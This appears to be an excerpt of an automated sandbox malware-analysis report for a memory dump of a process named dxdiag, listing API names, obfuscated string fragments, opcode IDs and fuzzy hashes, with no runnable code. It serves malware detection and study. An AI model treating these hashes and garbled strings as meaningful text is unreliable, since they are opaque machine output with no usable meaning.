                                                                                                                • API ID: BlanketProxy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3890896728-0
                                                                                                                • Opcode ID: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
                                                                                                                • Instruction ID: 92cf7cd52a0b26c4ab4cf5037d2a8ef19b8d3357c895488f279ef1d82b73d9c3
                                                                                                                • Opcode Fuzzy Hash: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
                                                                                                                • Instruction Fuzzy Hash: 3AF0B7B45087018FE314DF29D5A8716BBF0FB84304F10891CE4968B391CBB5A648CF86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlanketProxy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3890896728-0
                                                                                                                • Opcode ID: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
                                                                                                                • Instruction ID: 0899820397365732e2da90ce65a4afed0ef7eceabc5b433f77fa9bfe01264dcb
                                                                                                                • Opcode Fuzzy Hash: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
                                                                                                                • Instruction Fuzzy Hash: BFF0DA745093018FD314DF29D0A871BBBE0FB88714F00891CE4958B390DB75A648CF82
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(?,00000000), ref: 0043862D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
                                                                                                                • Instruction ID: 4b498aae19b3e6e4938b8adf9d962b10c79c0f4802967231e3dbdd59588952b8
                                                                                                                • Opcode Fuzzy Hash: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
                                                                                                                • Instruction Fuzzy Hash: 7DC08C31404A26EBCA102F18BC07BCA3A20DF0A321F0308A1F900980B6C739DC92C9DC
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,00000000,00414C1F,00000400), ref: 004385F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
                                                                                                                • Instruction ID: 1ff8db07d7a6c5951f5da3d7f0bd717f597c0928698ba3c33e75086f2b70e91b
                                                                                                                • Opcode Fuzzy Hash: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
                                                                                                                • Instruction Fuzzy Hash: 3CC04C35445220AAC6106B15EC05B867B54DF49351F014055B104660728760AC418AD9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $!$"$"$#$$$$$$$&$&$($)$+$-$/$0$3$4$5$7$9$9$9$:$;$;$;$<$<$=$=$=$>$?$@$@$A$A$A$B$C$D$D$E$F$G$H$H$I$K$K$K$M$M$N$O$O$Q$Q$R$S$U$W$W$W$Y$Y$Z$[$]$_$`$a$a$a$c$c$d$e$e$f$f$g$g$g$g$i$k$m$o$o$p$p$q$r$s$t$v${$|$}$}
                                                                                                                • API String ID: 0-2298439183
                                                                                                                • Opcode ID: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
                                                                                                                • Instruction ID: 083fd10bc4ed8af0561365f8755418076205ed3f8dd68f74a68bf74da31982d7
                                                                                                                • Opcode Fuzzy Hash: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
                                                                                                                • Instruction Fuzzy Hash: 8E13B23160C7C18AD335CB38845539FBBE2ABD6324F188A6EE4E9873D2D6788542C757
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 29B$8X$CH$GP$JY$O:$OM$R\$^E$rs$rM$uv${w$02$46$GI$|~
                                                                                                                • API String ID: 0-2187006609
                                                                                                                • Opcode ID: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
                                                                                                                • Instruction ID: 571314284cfc883063d67328f2f268305e4fa17690c0835aa9d0b0b07ad656d6
                                                                                                                • Opcode Fuzzy Hash: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
                                                                                                                • Instruction Fuzzy Hash: 37421DB564C3818AD330CF54D842B9FBAF2EBD2300F00892DD5E96B256C775864ADB97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #$&$)$-$<$H$[$[$\$\$\$]$]$q$y$|$~
                                                                                                                • API String ID: 0-875500967
                                                                                                                • Opcode ID: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
                                                                                                                • Instruction ID: 5554db80201a8ba6ea3474702efe9192065d530e6ae71f569cd6bb248edef4d2
                                                                                                                • Opcode Fuzzy Hash: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
                                                                                                                • Instruction Fuzzy Hash: 4FB10A23A1D7904AE314897C884535B9EC31BE6224F2ECB6DD8E5973C2D57DC9068393
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                • String ID: !$#$$$m$o$r
                                                                                                                • API String ID: 2832541153-1228291082
                                                                                                                • Opcode ID: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
                                                                                                                • Instruction ID: 5f04a8027e3d7a55f1d66e97924e677b1801266d210010e4a128a03f4dc74b7a
                                                                                                                • Opcode Fuzzy Hash: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
                                                                                                                • Instruction Fuzzy Hash: CC41907160C3818FD300EF78959935EBFE0AB95308F08593EE4C987292D6BD85499B5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *Z/\$-R?T$0J4L$3N#@$<F9X$<^#P$C>K0$G6DH$K:^<$M"`$$M*T,$P&U8$UV$Z.\ $g2V4$RT
                                                                                                                • API String ID: 0-3486322482
                                                                                                                • Opcode ID: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
                                                                                                                • Instruction ID: bfdc5e733220a4266b0cee0809eb26845f7d15cd3bd46db4d77d1dfb423e5921
                                                                                                                • Opcode Fuzzy Hash: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
                                                                                                                • Instruction Fuzzy Hash: 14B199B45093918BD7348F29C4907EBBBE0AF96304F558A2DD8C95B390DB798885CB87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: =?$$q?s$'m&o$,Yu[$5Q0S$8I&K$8uZw$HiBk$O;$W;$WaLc$WePg$iAbC$i]m_${-G/
                                                                                                                • API String ID: 0-2287720743
                                                                                                                • Opcode ID: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
                                                                                                                • Instruction ID: 29238d0ecd9fd652967a2f07aa34a714a27bdb8438f077e70085c6c9b953e65e
                                                                                                                • Opcode Fuzzy Hash: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
                                                                                                                • Instruction Fuzzy Hash: BAC1ABB4200301CFDB288F25D8917567BA1FB45310F2586BDDC5A9F29ADB34D842CF94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1>?<$AHAq$ASSU$R][j$R_QQ$UaUQ$[]SN$_s$$bs$$e$ubk$$}nn~
                                                                                                                • API String ID: 0-3156591309
                                                                                                                • Opcode ID: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
                                                                                                                • Instruction ID: cb5f53731036b88b860b65b87d3060a00e5eb7a07e2cb5fd5f7d8ae11adf455f
                                                                                                                • Opcode Fuzzy Hash: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
                                                                                                                • Instruction Fuzzy Hash: 8852577590C3518FC725CF25C8407ABBBE1AF86304F084A6DE8E59B382D739D906CB96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <=$BdB$jdB$r`B$~bB$7Wu
                                                                                                                • API String ID: 0-3743820354
                                                                                                                • Opcode ID: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
                                                                                                                • Instruction ID: 340aef6d2692e72857662edcd36e925b24db6bbbcaf4b5bc792621142b15778b
                                                                                                                • Opcode Fuzzy Hash: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
                                                                                                                • Instruction Fuzzy Hash: 82E123B560C3808BD734DF24D85276BBBE1FB82314F05892DE0D69B352EB798501CB8A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00439E40: LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419CA6
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419D0B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                                • String ID: I,~M$J,I.$ST$Wu
                                                                                                                • API String ID: 764372645-1860371270
                                                                                                                • Opcode ID: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
                                                                                                                • Instruction ID: 3a946de6d06df9888b19065ab5da8f4f8076a039cb09845347bca5e298d55306
                                                                                                                • Opcode Fuzzy Hash: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
                                                                                                                • Instruction Fuzzy Hash: ED8229746083409BE714DF24D890BAFBBE2EBD6314F28892DE58547392D779DC81CB4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )$A}A$C$H$N$cp$h{A$ts
                                                                                                                • API String ID: 0-2460436281
                                                                                                                • Opcode ID: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
                                                                                                                • Instruction ID: c091a61c3610e84d45043be11fa95010c19d3da449df3a573e39c3d9f215f14f
                                                                                                                • Opcode Fuzzy Hash: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
                                                                                                                • Instruction Fuzzy Hash: EFF14375A083518BD714DF28C8906ABB7F2FFD5314F188A2DE4C98B391EB389941C796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LS`$QS`$^=$ca}`$f}oe$v$zE$
                                                                                                                • API String ID: 0-1738842590
                                                                                                                • Opcode ID: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
                                                                                                                • Instruction ID: 8397652dd6c80c3d6384abaef94ac051be11649c1be440025a567e8f984c36e4
                                                                                                                • Opcode Fuzzy Hash: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
                                                                                                                • Instruction Fuzzy Hash: C0C1E77260C3918BC326CF69849076BFFE1AF96310F094A6DE4D55B382D3798D0AC796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !YZ[$'I8K$(MO$*O$1Q<S$5U$W$7E%G$vw
                                                                                                                • API String ID: 0-110145457
                                                                                                                • Opcode ID: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
                                                                                                                • Instruction ID: 1450f61bfb5304e21163cb8565421a3d7c92680fc4378e386598e8c3f998bcbb
                                                                                                                • Opcode Fuzzy Hash: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
                                                                                                                • Instruction Fuzzy Hash: B2B1C1B6A1C3618BC724CF19A84166BB7F1EFC1304F14882DE9899B341E778D50ACB86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $Q$,.-($. &.$?c:7$QVTH$]VWC$qAB_
                                                                                                                • API String ID: 0-2163668455
                                                                                                                • Opcode ID: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
                                                                                                                • Instruction ID: d19ded286c5482f05c95a3e280dd030e35027ba8af5a7be08d79747085adfcff
                                                                                                                • Opcode Fuzzy Hash: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
                                                                                                                • Instruction Fuzzy Hash: 99B179717083A18BD724CB34A4412EBB7D1DFD6300F948A2FD9998B382E338D905D79A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: jPl$%R6T$%V6h$1F&X$=N?@$|Z7\
                                                                                                                • API String ID: 0-720933595
                                                                                                                • Opcode ID: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
                                                                                                                • Instruction ID: f39d86c070ab500bf256f0a98519923189adf886995b2a16e0c98b1acc46fafb
                                                                                                                • Opcode Fuzzy Hash: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
                                                                                                                • Instruction Fuzzy Hash: F4227A75A04255CFDB04CF68E8817AEBBB2FF4A310F68416DE441AB392DB399D01CB58
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2l$G$a+ab$gdk|$oscd$|ed
                                                                                                                • API String ID: 0-3137366845
                                                                                                                • Opcode ID: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
                                                                                                                • Instruction ID: 2b51620a84509c9e7f89b2250eaa4d1d77fcbe22bbd39bf4a7e45a94f0a53178
                                                                                                                • Opcode Fuzzy Hash: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
                                                                                                                • Instruction Fuzzy Hash: 76415872A483904BD318CF69C89239BBFE2EB96304F04496DF5C597381D7BAC9058B86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: nB$"$2lB$2pB$bpB
                                                                                                                • API String ID: 0-1940457101
                                                                                                                • Opcode ID: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
                                                                                                                • Instruction ID: 558fbc4cb8a2958d1f7e7249d7ccc9316d198c96dd93b6a73ccfed5fe5d12803
                                                                                                                • Opcode Fuzzy Hash: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
                                                                                                                • Instruction Fuzzy Hash: 6B020375608351CFD714DF28D88032AFBE2BF9A320F198A6DE4A5873E1E778D9058B45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,Y$V,$Z[$^E$pqr
                                                                                                                • API String ID: 0-279934592
                                                                                                                • Opcode ID: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
                                                                                                                • Instruction ID: 5742babc61ebacdb7949157f0bd4e01d84a0f7fb4511d1348a61e7c30121f0f1
                                                                                                                • Opcode Fuzzy Hash: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
                                                                                                                • Instruction Fuzzy Hash: E2D10FB4608341DFE724CF20E881B6FBBA0FB86704F94892DE68597391D778D905CB4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &'$53/L$FD089AA551ECCED45EC6468C5C963249$rt
                                                                                                                • API String ID: 0-3412296137
                                                                                                                • Opcode ID: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
                                                                                                                • Instruction ID: c43cc0f4767f0386331e86a65d878f221811e9f74dfb90e72f7e2679060c6ec5
                                                                                                                • Opcode Fuzzy Hash: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
                                                                                                                • Instruction Fuzzy Hash: 19A100B050C3808BD314DF358890A6FBBE4EF92314F14496DE1E69B3A2D738D90ACB56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: KT$LM$OM$stu
                                                                                                                • API String ID: 0-2300950273
                                                                                                                • Opcode ID: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
                                                                                                                • Instruction ID: e0790f8a2260445ed915882484265c43d046fe5b7e2851accbdc848ea5d765e3
                                                                                                                • Opcode Fuzzy Hash: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
                                                                                                                • Instruction Fuzzy Hash: 37A1BC7660C3449BD704EF26D8914AFBBF6EB96310F444C2DF4D687342D6398A098B9A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .tv$D$KL$`
                                                                                                                • API String ID: 0-1798403091
                                                                                                                • Opcode ID: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
                                                                                                                • Instruction ID: 3f30fe60f5f3189d76d806e3d19590f01995e251e5eb8f492cdef6a97151cc10
                                                                                                                • Opcode Fuzzy Hash: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
                                                                                                                • Instruction Fuzzy Hash: 4291ABB04083918BE334CF24C4A57ABBBE1FF86314F158A5DD4C94B392D7798885CB9A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #'!7$2-:.$<r/+
                                                                                                                • API String ID: 0-1588113804
                                                                                                                • Opcode ID: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
                                                                                                                • Instruction ID: f9fba50b878ae6ca9efe469270682ac7877d2de3c9241f307d5b60eb0439a20b
                                                                                                                • Opcode Fuzzy Hash: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
                                                                                                                • Instruction Fuzzy Hash: 14322276A08212CFD318CF28DC9166AB3E2FF89314F49853DE99597390D7B8D901CB85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +$QWj$W
                                                                                                                • API String ID: 0-3739570015
                                                                                                                • Opcode ID: f03c26e0e61ad76241ec77b420eb465f03cfdda98418e8febe6a45b60db9b282
                                                                                                                • Instruction ID: 69a98fb83b870544fd8d41a8c5e62acc4f3576c5134d378220855062fcb6874c
                                                                                                                • Opcode Fuzzy Hash: f03c26e0e61ad76241ec77b420eb465f03cfdda98418e8febe6a45b60db9b282
                                                                                                                • Instruction Fuzzy Hash: F1F114719083118BD324CF25C8907ABB7F1FF89710F198A6EE8C997351E7789941CB5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 9$9$yz
                                                                                                                • API String ID: 0-3458379945
                                                                                                                • Opcode ID: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
                                                                                                                • Instruction ID: 8cb2bd10700cf6573130ed67dfada133875a43ff1573faf34ad6f8871ffd4bd0
                                                                                                                • Opcode Fuzzy Hash: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
                                                                                                                • Instruction Fuzzy Hash: C2C130B6A0C3118BC714DF68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 9$9$yz
                                                                                                                • API String ID: 0-3458379945
                                                                                                                • Opcode ID: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
                                                                                                                • Instruction ID: bbb38220efc2b624f5925e2889de6455b8c212916dff37784df4ba08f5a7ac67
                                                                                                                • Opcode Fuzzy Hash: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
                                                                                                                • Instruction Fuzzy Hash: ABC120B660C3118BC7249F68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &'$:$x#X%
                                                                                                                • API String ID: 0-3823454105
                                                                                                                • Opcode ID: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
                                                                                                                • Instruction ID: 8f3827cfcbc4e38f67a50f9a1e96b6c0906f4e5a80d62fafde117fdb12ab2f56
                                                                                                                • Opcode Fuzzy Hash: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
                                                                                                                • Instruction Fuzzy Hash: A4D1277A618652CBCB185F24E86237B73E1FF4A745F0B807ED482872A1EB798950CB45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: OG$pYA$pw
                                                                                                                • API String ID: 0-4264688152
                                                                                                                • Opcode ID: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
